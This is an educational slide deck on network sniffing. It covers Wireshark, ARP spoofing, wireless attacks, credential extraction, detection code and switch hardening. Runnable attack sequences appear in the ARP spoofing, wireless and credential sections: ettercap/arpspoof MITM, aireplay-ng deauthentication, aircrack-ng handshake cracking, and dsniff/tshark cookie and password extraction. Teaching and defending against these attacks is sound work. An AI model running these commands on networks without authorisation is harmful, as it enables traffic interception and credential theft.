Author: Milav Dabgar
Sniffing

Network Traffic Interception and Analysis

Understanding Packet Capture, Analysis, and Security Implications

Man-in-the-Middle Attack

Network Sniffing Overview

Network Sniffing: The process of capturing, intercepting, and analyzing network traffic as it passes through network infrastructure to examine data packets and extract information.

Core Concepts:

  • Packet Capture: Intercepting data packets from network interfaces
  • Traffic Analysis: Examining packet contents and patterns
  • Protocol Decoding: Understanding various network protocols
  • Data Extraction: Retrieving useful information from packets
  • Network Monitoring: Continuous traffic surveillance
  • Security Assessment: Identifying vulnerabilities and threats
Dual Purpose: Network sniffing serves legitimate network administration and security purposes as well as malicious surveillance and attack activities.

Types of Network Sniffing

Passive Sniffing:

  • Method: Listening to network traffic without interaction
  • Detection: Difficult to detect by network devices
  • Network Type: Effective on hubs and wireless networks
  • Traffic Access: Only traffic sent to or through sniffer
  • Examples: Hub-based networks, wireless monitoring
  • Stealth: Completely undetectable to targets

Active Sniffing:

  • Method: Actively manipulating network to capture traffic
  • Detection: May be detectable through network monitoring
  • Network Type: Required for switched network environments
  • Traffic Access: Can capture traffic not normally accessible
  • Examples: ARP spoofing, MAC flooding, DHCP attacks
  • Stealth: May generate suspicious network activity

Network Infrastructure Impact:

  • Hub Networks: All traffic visible to all ports (broadcast domain)
  • Switched Networks: Traffic segmented by MAC address tables
  • Wireless Networks: Radio frequency transmission accessible to all
  • Router Networks: Inter-VLAN traffic may be observable
  • Internet Backbones: High-volume traffic aggregation points

Network Protocols and Vulnerability

Vulnerable Protocols:

  • HTTP: Unencrypted web traffic
  • FTP: File transfer with plain text credentials
  • Telnet: Unencrypted remote access
  • SMTP: Email transmission without encryption
  • POP3/IMAP: Email retrieval protocols
  • SNMP v1/v2: Network management protocols

Partially Vulnerable:

  • HTTPS: Encrypted but metadata visible
  • SSH: Encrypted but connection patterns visible
  • VPN: Tunnel endpoints and traffic volume
  • DNS: Query names may be visible
  • NTP: Time synchronization data
  • DHCP: IP assignment information

Protected Protocols:

  • TLS/SSL: Transport layer security
  • IPSec: Network layer encryption
  • WPA3: Strong wireless encryption
  • SFTP: Secure file transfer
  • HTTPS: Encrypted web communications
  • SNMPv3: Authenticated SNMP
Protocol Stack Sniffing Example:

Layer 1 (Physical): Radio frequency, electrical signals
Layer 2 (Data Link): MAC addresses, frame headers
Layer 3 (Network): IP addresses, routing information
Layer 4 (Transport): TCP/UDP ports, sequence numbers
Layer 5+ (Application): HTTP, FTP, email content

Captured Data:
• Source/Destination MAC: 00:11:22:33:44:55 → 66:77:88:99:aa:bb
• Source/Destination IP: 192.168.1.100 → 10.0.0.50
• Protocol: TCP Port 80 (HTTP)
• Payload: GET /login.php HTTP/1.1 + form data

Network Sniffing Tools and Software

Professional Tools:

  • Wireshark: Most popular network protocol analyzer
  • tcpdump: Command-line packet analyzer
  • NetworkMiner: Network forensic analysis tool
  • Omnipeek: Commercial network analysis suite
  • SolarWinds NPM: Enterprise network monitoring
  • PRTG: Network monitoring solution

Penetration Testing Tools:

  • Ettercap: Comprehensive sniffing suite
  • Bettercap: Modern network attack framework
  • dSniff: Collection of sniffing tools
  • Cain & Abel: Windows password recovery tool
  • Kismet: Wireless network detector
  • airodump-ng: WiFi packet capture

Specialized Sniffers:

  • MailSnarf: Email message sniffing
  • URLSnarf: HTTP request capturing
  • WebSpy: Web browsing activity monitoring
  • SSHMitM: SSH connection interception
  • DNSSpoof: DNS response forging
  • Fragrouter: Network packet fragmentation

Tool Selection Criteria:

  • Protocol Support: Comprehensive protocol decoding capabilities
  • Performance: High-speed packet capture and analysis
  • User Interface: Intuitive analysis and visualization
  • Filtering: Advanced packet filtering and search
  • Export Options: Multiple output formats
  • Platform Support: Operating system compatibility

Wireshark: The Ultimate Network Analyzer

Wireshark: Free, open-source network protocol analyzer that provides deep inspection of network traffic with comprehensive protocol support and analysis capabilities.
Wireshark Key Features and Usage:

# Installation and Basic Usage
sudo apt install wireshark
sudo usermod -aG wireshark $USER
wireshark

# Command-line equivalent (tshark)
tshark -i eth0 -w capture.pcap
tshark -r capture.pcap -Y "http"

Key Features:

  • Live Capture: Real-time packet capture from network interfaces
  • Deep Inspection: Layer 2-7 protocol analysis
  • Rich Filtering: Display and capture filters
  • Statistical Analysis: Traffic patterns and trends
  • Expert System: Automatic problem detection
  • Extensibility: Plugin architecture and scripting

Common Display Filters:
ip.addr == 192.168.1.100
tcp.port == 80 or tcp.port == 443
http.request.method == "POST"
dns.flags.response == 0
tcp.analysis.flags && !tcp.analysis.window_update

Active Sniffing Attack Techniques

Active Sniffing: Techniques that manipulate network infrastructure or protocols to redirect or intercept traffic that wouldn't normally be accessible.

ARP Spoofing/Poisoning:

  • Method: Send fake ARP responses
  • Effect: Redirect traffic through attacker
  • Target: Switched network environments
  • Detection: ARP table monitoring
  • Tools: Ettercap, Bettercap, ARPspoof
  • Mitigation: Static ARP entries, DAI

MAC Flooding:

  • Method: Overflow switch MAC address table
  • Effect: Force switch into hub mode
  • Target: Older or vulnerable switches
  • Detection: Switch log analysis
  • Tools: macof, Yersinia
  • Mitigation: Port security, MAC limits

DHCP Attacks:

  • DHCP Spoofing: Rogue DHCP server
  • DHCP Starvation: Exhaust IP pool
  • Default Gateway: Traffic redirection
  • DNS Server: DNS poisoning setup

DNS Spoofing:

  • Cache Poisoning: Corrupt DNS cache
  • Response Injection: Fake DNS responses
  • Domain Hijacking: Redirect domains
  • Pharming: Traffic misdirection

SSL/TLS Attacks:

  • SSL Stripping: Downgrade to HTTP
  • Certificate Spoofing: Fake certificates
  • MITM Proxies: Transparent proxying
  • HSTS Bypass: Bypass security headers

ARP Spoofing Attack Example

ARP Spoofing: Man-in-the-middle attack that exploits the Address Resolution Protocol to intercept network traffic between hosts.
ARP Spoofing Attack Steps:

# 1. Network Discovery
nmap -sn 192.168.1.0/24
arp -a

# 2. Enable IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl net.ipv4.ip_forward=1

# 3. ARP Spoofing with ettercap
ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
ettercap -T -i eth0 -M arp /192.168.1.1-254//

# 4. Alternative with arpspoof
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

# 5. Capture Traffic
tcpdump -i eth0 -w mitm_capture.pcap
wireshark -i eth0

# 6. Analysis
# View captured credentials, cookies, and sensitive data
tshark -r mitm_capture.pcap -Y "http.request.method==POST"
tshark -r mitm_capture.pcap -T fields -e http.cookie

Wireless Network Sniffing

Wireless Sniffing: Capturing and analyzing wireless network traffic, taking advantage of the broadcast nature of radio frequency communications.

WiFi Sniffing Process:

  • Monitor Mode: Enable wireless interface monitoring
  • Channel Hopping: Scan across all WiFi channels
  • Frame Capture: Collect 802.11 management frames
  • Beacon Analysis: Identify access points and networks
  • Client Tracking: Monitor device associations
  • Traffic Analysis: Analyze captured packets

Wireless Attack Vectors:

  • Open Networks: Unencrypted traffic capture
  • WEP Cracking: Weak encryption key recovery
  • WPA Handshake: Capture authentication handshakes
  • Evil Twin: Rogue access point attacks
  • Deauthentication: Force client reconnections
  • Packet Injection: Inject malicious frames
Wireless Sniffing Commands:

# Enable monitor mode
airmon-ng start wlan0
iwconfig wlan0mon mode monitor

# Discover wireless networks
airodump-ng wlan0mon
kismet -c wlan0mon

# Capture specific network traffic
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauthentication attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# WPA handshake analysis
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

Password and Credential Sniffing

Credential Harvesting: Extracting usernames, passwords, and authentication tokens from captured network traffic and protocols.

HTTP Authentication:

  • Basic Auth: Base64 encoded credentials
  • Form Data: POST request parameters
  • Cookies: Session and authentication tokens
  • Headers: Custom authentication headers
  • URLs: Credentials in query parameters

Protocol Credentials:

  • FTP: USER and PASS commands
  • Telnet: Login sequences
  • SMTP: AUTH LOGIN commands
  • POP3/IMAP: Authentication exchanges
  • SNMP: Community strings

Advanced Techniques:

  • Session Hijacking: Cookie and token theft
  • Kerberos: Ticket extraction
  • NTLM: Challenge-response capture
  • SSL/TLS: Certificate and key extraction
  • VPN: IPSec and OpenVPN credentials
Credential Extraction Examples:

# HTTP Basic Authentication (Wireshark filter)
http.authbasic

# Extract FTP credentials
tshark -r capture.pcap -Y "ftp.request.command==USER or ftp.request.command==PASS"

# Find HTTP POST data
tshark -r capture.pcap -Y "http.request.method==POST" -T fields -e http.file_data

# Using dsniff tools
dsniff -i eth0
urlsnarf -i eth0
mailsnarf -i eth0

# Extract cookies and tokens
tshark -r capture.pcap -Y "http.cookie" -T fields -e http.cookie
tshark -r capture.pcap -Y "http.authorization" -T fields -e http.authorization
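
The layer-by-layer view from the Protocol Stack Sniffing Example and the HTTP credential fields listed above, worked through in one added Python example that is not part of the original slides: it decodes a single constructed Ethernet/IPv4/TCP frame (the slide's MAC and IP pairs carrying an HTTP POST to /login.php) and reports the cleartext credentials a sniffer on the path would see, which is the audit a defender runs over a capture to find services still missing TLS. The sample frame, the function names and the alice/hunter2 credentials are all constructed for illustration.

```python
import base64
import struct

ETH_P_IP = 0x0800
IPPROTO_TCP = 6


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def decode_frame(frame: bytes) -> dict:
    """Walk Ethernet -> IPv4 -> TCP and return what each layer exposes to a sniffer."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])   # Layer 2 header
    if ethertype != ETH_P_IP:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                                    # IPv4 header length
    if ip[9] != IPPROTO_TCP:
        raise ValueError("not a TCP segment")
    tcp = ip[ihl:]                                              # Layer 4 header
    sport, dport, seq, _ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    payload = tcp[(off_flags >> 12) * 4:]                       # Layer 5+ (application)
    return {"src_mac": _mac(src), "dst_mac": _mac(dst),
            "src_ip": ".".join(map(str, ip[12:16])), "dst_ip": ".".join(map(str, ip[16:20])),
            "sport": sport, "dport": dport, "seq": seq, "payload": payload}


def find_cleartext_credentials(payload: bytes) -> dict:
    """Report Basic-auth credentials and form fields readable in an HTTP request."""
    found = {}
    head, _, body = payload.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"authorization: basic "):   # Base64 is encoding, not encryption
            user, _, pw = base64.b64decode(line.split()[2]).partition(b":")
            found["basic_user"], found["basic_password"] = user.decode(), pw.decode()
    if body:                                                    # POST form parameters
        found["form"] = dict(kv.split("=", 1) for kv in body.decode().split("&"))
    return found


def build_sample_frame() -> bytes:
    """Constructed sample (not a real capture): the slide's MAC/IP pairs carrying
    an HTTP POST to /login.php with both a Basic header and a form body."""
    body = b"user=alice&pass=hunter2"
    http = (b"POST /login.php HTTP/1.1\r\nHost: 10.0.0.50\r\n"
            b"Authorization: Basic " + base64.b64encode(b"alice:hunter2") + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
    tcp = struct.pack("!HHIIHHHH", 49152, 80, 1000, 0, 5 << 12 | 0x18, 65535, 0, 0) + http
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, IPPROTO_TCP, 0,
                     bytes([192, 168, 1, 100]), bytes([10, 0, 0, 50])) + tcp
    eth = bytes.fromhex("66778899aabb") + bytes.fromhex("001122334455") + struct.pack("!H", ETH_P_IP)
    return eth + ip
```

Checksums are left at zero because the decoder never validates them; a real capture would carry the sender's values.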

Sniffing Detection Techniques

Detection Challenge: Passive sniffing is inherently difficult to detect, while active sniffing may leave observable traces in network traffic and logs.

Passive Sniffing Detection:

  • Physical Inspection: Unauthorized network taps
  • Port Monitoring: Unexpected port mirroring
  • Device Inventory: Unknown network interfaces
  • Performance Impact: Network latency changes
  • Promiscuous Mode: Network interface status
  • Switch Logs: Port configuration changes

Active Sniffing Detection:

  • ARP Table Monitoring: Duplicate or changing entries
  • MAC Address Tracking: Spoofed addresses
  • Network Latency: Increased response times
  • DHCP Logs: Multiple servers or conflicts
  • DNS Query Analysis: Suspicious resolutions
  • Certificate Warnings: SSL/TLS anomalies
Detection Tools and Commands:

# Check for promiscuous mode interfaces
ip link show
ifconfig -a | grep PROMISC

# Monitor ARP table changes
arp -a > arp_baseline.txt
watch -n 5 'arp -a | diff - arp_baseline.txt'

# Detect ARP spoofing with arpwatch
arpwatch -i eth0

# Check for duplicate IP addresses
arping -D 192.168.1.100

# Monitor DNS responses
dig @8.8.8.8 example.com
dig @192.168.1.1 example.com

# SSL certificate verification
openssl s_client -connect example.com:443 -servername example.com
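
The ARP table monitoring and arpwatch checks above, implemented as an added Python example that is not from the slides or from arpwatch itself: a small monitor learns IP-to-MAC bindings from ARP packets and flags the three symptoms a defender looks for, a binding that changes, an unsolicited reply for a protected address such as the default gateway, and one MAC answering for several IPs. The ArpMonitor class, the documentation-range MAC addresses and the replayed packet list are constructed for illustration.

```python
from collections import defaultdict

ARP_REQUEST, ARP_REPLY = 1, 2


class ArpMonitor:
    """arpwatch-style tracker: learn IP->MAC bindings and flag spoofing symptoms."""

    def __init__(self, protected_ips=()):
        self.table = {}                         # ip -> MAC currently bound to it
        self.claims = defaultdict(set)          # mac -> ips it has answered for
        self.pending = set()                    # (asker_ip, asked_ip) awaiting a reply
        self.protected = set(protected_ips)     # e.g. the default gateway
        self.alerts = []

    def observe(self, opcode, sender_ip, sender_mac, target_ip):
        """Feed one ARP packet (as parsed from a capture) and return the new alerts."""
        mac = sender_mac.lower()
        before = len(self.alerts)
        if opcode == ARP_REQUEST:
            self.pending.add((sender_ip, target_ip))
        elif opcode == ARP_REPLY:
            if (target_ip, sender_ip) in self.pending:
                self.pending.discard((target_ip, sender_ip))
            elif sender_ip in self.protected:
                # Nobody asked, yet someone is announcing the gateway's address
                self.alerts.append(f"unsolicited reply for {sender_ip} from {mac}")
        known = self.table.setdefault(sender_ip, mac)
        if known != mac:                        # arpwatch calls this a "flip flop"
            self.alerts.append(f"binding change {sender_ip}: {known} -> {mac}")
            self.table[sender_ip] = mac
        ips = self.claims[mac]
        if sender_ip not in ips:
            ips.add(sender_ip)
            if len(ips) > 1 and ips & self.protected:
                self.alerts.append(f"{mac} claims {sorted(ips)} including a protected IP")
        return self.alerts[before:]


def replay_sample():
    """Constructed sample capture (not real traffic): a normal request/reply pair,
    then a host at aa:aa:... answering for both the gateway and the first host."""
    gw, victim, atk = "192.168.1.1", "192.168.1.100", "aa:aa:aa:aa:aa:aa"
    packets = [
        (ARP_REQUEST, victim, "00:11:22:33:44:55", gw),      # who has the gateway?
        (ARP_REPLY,   gw,     "00:00:5e:00:53:01", victim),  # legitimate answer
        (ARP_REPLY,   gw,     atk,                 victim),  # unsolicited, wrong MAC
        (ARP_REPLY,   victim, atk,                 gw),      # same MAC, second IP
    ]
    mon = ArpMonitor(protected_ips=[gw])
    return [alert for pkt in packets for alert in mon.observe(*pkt)]
```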

Sniffing Prevention and Countermeasures

Defense Strategy: Multi-layered approach combining network segmentation, encryption, monitoring, and access controls to prevent or mitigate sniffing attacks.

Network Security:

  • Switch Security: Port security, MAC limiting
  • VLAN Segmentation: Network isolation
  • Dynamic ARP Inspection: ARP validation
  • DHCP Snooping: DHCP security
  • Private VLANs: Host isolation
  • Network Access Control: 802.1X authentication

Encryption and Protocols:

  • HTTPS: Web traffic encryption
  • SSH: Secure remote access
  • VPN: Network tunnel encryption
  • WPA3: Strong wireless encryption
  • IPSec: Network layer security
  • TLS: Transport layer security

Monitoring and Detection:

  • Network Monitoring: Traffic analysis
  • Intrusion Detection: IDS/IPS deployment
  • SIEM Integration: Log correlation
  • Anomaly Detection: Behavioral analysis
  • Honeypots: Deception technology
  • Threat Intelligence: IOC monitoring
Switch Security Configuration:

# Enable port security
interface fastethernet 0/1
switchport mode access
switchport port-security
switchport port-security maximum 2
switchport port-security violation restrict

# Enable DHCP snooping
ip dhcp snooping
ip dhcp snooping vlan 10
interface fastethernet 0/24
ip dhcp snooping trust

# Enable Dynamic ARP Inspection
ip arp inspection vlan 10
interface fastethernet 0/24
ip arp inspection trust

Legal and Ethical Considerations

Legal Framework: Network sniffing activities must comply with applicable laws, regulations, and organizational policies regarding privacy and unauthorized access.

Legitimate Uses:

  • Network Administration: Troubleshooting and optimization
  • Security Monitoring: Threat detection and analysis
  • Forensic Investigation: Incident response and evidence
  • Compliance Auditing: Regulatory requirement validation
  • Penetration Testing: Authorized security assessment
  • Research: Academic and security research

Legal Requirements:

  • Authorization: Explicit permission from network owners
  • Scope Definition: Clear boundaries and limitations
  • Data Protection: Privacy law compliance (GDPR, HIPAA)
  • Employee Notification: Workplace monitoring disclosure
  • Log Retention: Data retention and destruction policies
  • Chain of Custody: Evidence handling procedures

Best Practice Guidelines:

  • Written Policies: Clear organizational guidelines for network monitoring
  • Access Controls: Restrict sniffing tool access to authorized personnel
  • Training: Proper training on legal and ethical use
  • Documentation: Maintain detailed records of monitoring activities
  • Regular Review: Periodic policy and procedure updates
  • Incident Response: Procedures for handling discovered violations

Advanced Sniffing and Evasion Techniques

Advanced Methods: Sophisticated sniffing techniques used by advanced attackers to bypass security controls and evade detection.

Steganographic Sniffing:

  • Covert Channels: Hidden communication methods
  • Protocol Tunneling: Data hiding in legitimate protocols
  • Timing Attacks: Information extraction via timing
  • Side Channels: Electromagnetic and acoustic sniffing
  • Traffic Analysis: Metadata and pattern analysis

Evasion Techniques:

  • Anti-Detection: Avoiding security tool signatures
  • Traffic Mimicry: Disguising malicious traffic
  • Low and Slow: Gradual data exfiltration
  • Protocol Obfuscation: Traffic pattern masking
  • Distributed Sniffing: Multiple collection points

Emerging Threats:

  • AI-Powered Analysis: Machine learning for traffic analysis
  • IoT Sniffing: Internet of Things device monitoring
  • 5G Networks: Next-generation wireless sniffing
  • Cloud Traffic: Virtualized network monitoring
  • Container Networks: Docker and Kubernetes sniffing
  • SDN Environments: Software-defined network monitoring

Incident Response for Sniffing Attacks

Response Strategy: Systematic approach to identifying, containing, and remediating network sniffing incidents while preserving evidence.
Sniffing Incident Response Process:

1. Detection and Analysis:
• Network anomaly identification
• Traffic pattern analysis
• Device and user behavior assessment
• Scope and impact evaluation

2. Containment:
• Isolate suspected compromised systems
• Block suspicious network connections
• Disable compromised accounts
• Prevent lateral movement

3. Investigation:
• Packet capture analysis
• Log file examination
• Device forensic analysis
• Timeline reconstruction

4. Eradication:
• Remove sniffing tools and malware
• Patch identified vulnerabilities
• Strengthen security controls
• Update security policies

5. Recovery and Monitoring:
• Restore affected systems
• Implement enhanced monitoring
• Validate security improvements
• Continuous threat hunting

Key Takeaways

  • Network sniffing is both a legitimate network administration tool and a security threat
  • Passive sniffing is harder to detect than active sniffing techniques
  • Switched networks require active sniffing methods like ARP spoofing
  • Wireless networks are particularly vulnerable to sniffing attacks
  • Encryption is the primary defense against traffic interception
  • Network segmentation and access controls reduce sniffing exposure
  • Detection requires monitoring for network anomalies and behaviors
  • Legal authorization is required for legitimate sniffing activities
Remember: Network sniffing capabilities should be used responsibly, with proper authorization and within legal boundaries, to improve network security rather than compromise it.
